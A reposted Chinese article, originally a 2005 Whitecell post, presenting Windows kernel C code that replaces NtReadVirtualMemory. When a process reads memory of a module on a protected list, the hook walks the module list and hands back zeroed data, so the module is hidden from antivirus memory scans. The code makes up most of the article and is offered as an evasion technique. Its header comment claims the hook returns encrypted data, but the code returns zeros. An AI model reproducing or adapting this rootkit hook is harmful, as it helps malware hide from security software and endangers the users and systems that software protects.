对抗杀毒软件的内存扫描

2024-04-20 16:38
文章标签 内存 扫描 对抗 杀毒软件

本文主要是介绍对抗杀毒软件的内存扫描,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Author:Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:2005-11-17

/*++
  Author: Polymorphours
 
 Date: 2005/1/10

 通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
 如果发现其他进程读被保护模块的内存,则返回0

--*/


typedef struct _LDR_DATA_TABLE_ENTRY {
 
 LIST_ENTRY InLoadOrderLinks;
 LIST_ENTRY InMemoryOrderLinks;
 LIST_ENTRY InInitializationOrderLinks;
 PVOID DllBase;
 PVOID EntryPoint;
 ULONG SizeOfImage;
 UNICODE_STRING FullDllName;
 UNICODE_STRING BaseDllName;
 
 
 /*
 +0x034 Flags: Uint4B
 +0x038 LoadCount: Uint2B
 +0x03a TlsIndex : Uint2B
 +0x03c HashLinks: _LIST_ENTRY
 +0x03c SectionPointer : Ptr32 Void
 +0x040 CheckSum : Uint4B
 +0x044 TimeDateStamp: Uint4B
 +0x044 LoadedImports: Ptr32 Void
 +0x048 EntryPointActivationContext : Ptr32 Void
 +0x04c PatchInformation : Ptr32 Void
 */
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/*++

 函数名: MyNtReadVirtualMemory
 
 参数:
  IN HANDLE ProcessHandle,
  IN PVOID BaseAddress,
  OUT PVOID Buffer,
  IN ULONG BufferLength,
  OUT PULONG ReturnLength OPTIONAL
 
 功能:
  隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程
 
 返回:
  NTSTATUS
 
--*/


NTSTATUS
MyNtReadVirtualMemory(
 IN HANDLE ProcessHandle,
 IN PVOID BaseAddress,
 OUT PVOID Buffer,
 IN ULONG BufferLength,
 OUT PULONG ReturnLength OPTIONAL
 )
{
 NTSTATUS status;
 PEPROCESS eProcess;
 PVOIDPeb;
 
 PPEB_LDR_DATA PebLdrData;
 PLDR_DATA_TABLE_ENTRY LdrDataTableHeadList;
 PLDR_DATA_TABLE_ENTRY LdrDataTableEntry;
 
 PLIST_ENTRY Blink;
 PPROTECT_NODEFileNode = NULL;
 BOOLEANbHideFlag = FALSE;
 ULONGImageMaxAddress = 0;

/*
#ifdef _DEBUG
 DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/

 status =ObReferenceObjectByHandle(
  ProcessHandle,
  FILE_READ_DATA,
  PsProcessType,
  KernelMode,
  (PVOID)& eProcess,
  NULL
  );
 if ( NT_SUCCESS(status) ) {
 
  //
  // 得到PEB的地址
  //
 
  Peb = (PVOID)(*(PULONG)((PCHAR) eProcess + PebOffset));
 
  //
  // 切换到目标进程空间
  //
 
 
  KeAttachProcess( eProcess );
 
  //
  // 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
  //

  if ( !MmIsAddressValid( Peb ) ) {

/*
#ifdef _DEBUG
 DbgPrint( "PEB is error./n" );
#endif
*/
 
 KeDetachProcess();
 ObDereferenceObject( eProcess );
 
 goto CLEANUP;
  }
 
  PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));
 
  if ( !PebLdrData ) {
 
 KeDetachProcess();
 ObDereferenceObject( eProcess );
 
 goto CLEANUP;
  }
 
  try {
 
 ProbeForRead (
  PebLdrData,
  sizeof(PEB_LDR_DATA),
  sizeof(ULONG)
  );
 
 //
 // 遍历模块链表
 //
 
 LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
 LdrDataTableEntry = LdrDataTableHeadList;
 
 
 do {
 
  ProbeForRead(
 LdrDataTableEntry,
 sizeof(LDR_DATA_TABLE_ENTRY),
 sizeof(ULONG)
 );
 
  if ( !LdrDataTableEntry->DllBase ) {

 LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 continue;
  }

 
  //
  // 判断读的内存属于那一个模块,如果都不属于,那么放过
  //

  ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);
 
  if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
  (ULONG)BaseAddress > ImageMaxAddress ) {

  //
  // 如果不是读模块区域,那么枚举下一个
  //

 LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 continue;
  }
 
  //
  // 如果是被保护的模块,那么返回虚假数据
  //

  bHideFlag = FALSE;
  Blink = ProtectFile.Blink;
 

  while ( Blink != &ProtectFile ) {

 FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );
 
 //
 // 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
 //

 if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {

  bHideFlag = TRUE;
  break;
 }

 Blink = Blink->Blink;
  }
 
  if ( bHideFlag ) {
 
 //
 // 返回原本的进程空间进行处理
 //

 KeDetachProcess();
 ObDereferenceObject( eProcess );

 ProbeForWrite(
  Buffer,
  BufferLength,
  sizeof(ULONG)
  );
 
 memset( Buffer, 0x00, BufferLength );
 
 ProbeForWrite(
  ReturnLength,
  sizeof(PULONG),
  sizeof(ULONG)
  );
 
 *ReturnLength = BufferLength;
 
 return STATUS_SUCCESS;
  }
 
  LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 
 } while ( LdrDataTableEntry != LdrDataTableHeadList );
 

  } except( EXCEPTION_EXECUTE_HANDLER ) {

 if ( !bHideFlag ) {
 
  KeDetachProcess();
  ObDereferenceObject( eProcess );
 }

 goto CLEANUP;
  }


  KeDetachProcess();
  ObDereferenceObject( eProcess );
 }
 
CLEANUP:

 return NtReadVirtualMemory(
 ProcessHandle,
 BaseAddress,
 Buffer,
 BufferLength,
 ReturnLength
 );
}


WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/ 
 

这篇关于对抗杀毒软件的内存扫描的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/920778

相关文章

关于Java内存访问重排序的研究

关于Java内存访问重排序的研究

《关于Java内存访问重排序的研究》文章主要介绍了重排序现象及其在多线程编程中的影响,包括内存可见性问题和Java内存模型中对重排序的规则... 目录什么是重排序重排序图解重排序实验as-if-serial语义内存访问重排序与内存可见性内存访问重排序与Java内存模型重排序示意表内存屏障内存屏障示意表Int
阅读更多...
如何测试计算机的内存是否存在问题? 判断电脑内存故障的多种方法

如何测试计算机的内存是否存在问题? 判断电脑内存故障的多种方法

《如何测试计算机的内存是否存在问题?判断电脑内存故障的多种方法》内存是电脑中非常重要的组件之一,如果内存出现故障,可能会导致电脑出现各种问题,如蓝屏、死机、程序崩溃等,如何判断内存是否出现故障呢?下... 如果你的电脑是崩溃、冻结还是不稳定,那么它的内存可能有问题。要进行检查,你可以使用Windows 11
阅读更多...
IDEA常用插件之代码扫描SonarLint详解

IDEA常用插件之代码扫描SonarLint详解

《IDEA常用插件之代码扫描SonarLint详解》SonarLint是一款用于代码扫描的插件,可以帮助查找隐藏的bug,下载并安装插件后,右键点击项目并选择“Analyze”、“Analyzewit... 目录SonajavascriptrLint 查找隐藏的bug下载安装插件扫描代码查看结果总结Sona
阅读更多...
python-nmap实现python利用nmap进行扫描分析

python-nmap实现python利用nmap进行扫描分析

《python-nmap实现python利用nmap进行扫描分析》Nmap是一个非常用的网络/端口扫描工具,如果想将nmap集成进你的工具里,可以使用python-nmap这个python库,它提供了... 目录前言python-nmap的基本使用PortScanner扫描PortScannerAsync异
阅读更多...
NameNode内存生产配置

NameNode内存生产配置

Hadoop2.x 系列,配置 NameNode 内存 NameNode 内存默认 2000m ,如果服务器内存 4G , NameNode 内存可以配置 3g 。在 hadoop-env.sh 文件中配置如下。 HADOOP_NAMENODE_OPTS=-Xmx3072m Hadoop3.x 系列,配置 Nam
阅读更多...
JVM内存调优原则及几种JVM内存调优方法

JVM内存调优原则及几种JVM内存调优方法

JVM内存调优原则及几种JVM内存调优方法 1、堆大小设置。 2、回收器选择。   1、在对JVM内存调优的时候不能只看操作系统级别Java进程所占用的内存,这个数值不能准确的反应堆内存的真实占用情况,因为GC过后这个值是不会变化的,因此内存调优的时候要更多地使用JDK提供的内存查看工具,比如JConsole和Java VisualVM。   2、对JVM内存的系统级的调优主要的目的是减少
阅读更多...
JVM 常见异常及内存诊断

JVM 常见异常及内存诊断

栈内存溢出 栈内存大小设置:-Xss size 默认除了window以外的所有操作系统默认情况大小为 1MB,window 的默认大小依赖于虚拟机内存。 栈帧过多导致栈内存溢出 下述示例代码,由于递归深度没有限制且没有设置出口,每次方法的调用都会产生一个栈帧导致了创建的栈帧过多,而导致内存溢出(StackOverflowError)。 示例代码: 运行结果: 栈帧过大导致栈内存
阅读更多...
理解java虚拟机内存收集

理解java虚拟机内存收集

学习《深入理解Java虚拟机》时个人的理解笔记 1、为什么要去了解垃圾收集和内存回收技术? 当需要排查各种内存溢出、内存泄漏问题时,当垃圾收集成为系统达到更高并发量的瓶颈时,我们就必须对这些“自动化”的技术实施必要的监控和调节。 2、“哲学三问”内存收集 what?when?how? 那些内存需要回收?什么时候回收?如何回收? 这是一个整体的问题,确定了什么状态的内存可以
阅读更多...
NGINX轻松管理10万长连接 --- 基于2GB内存的CentOS 6.5 x86-64

NGINX轻松管理10万长连接 --- 基于2GB内存的CentOS 6.5 x86-64

转自:http://blog.chinaunix.net/xmlrpc.php?r=blog/article&uid=190176&id=4234854 一 前言 当管理大量连接时,特别是只有少量活跃连接,NGINX有比较好的CPU和RAM利用率,如今是多终端保持在线的时代,更能让NGINX发挥这个优点。本文做一个简单测试,NGINX在一个普通PC虚拟机上维护100k的HTTP
阅读更多...
PHP原理之内存管理中难懂的几个点

PHP原理之内存管理中难懂的几个点

PHP的内存管理, 分为俩大部分, 第一部分是PHP自身的内存管理, 这部分主要的内容就是引用计数, 写时复制, 等等面向应用的层面的管理. 而第二部分就是今天我要介绍的, zend_alloc中描写的关于PHP自身的内存管理, 包括它是如何管理可用内存, 如何分配内存等. 另外, 为什么要写这个呢, 因为之前并没有任何资料来介绍PHP内存管理中使用的策略, 数据结构, 或者算法. 而在我们
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2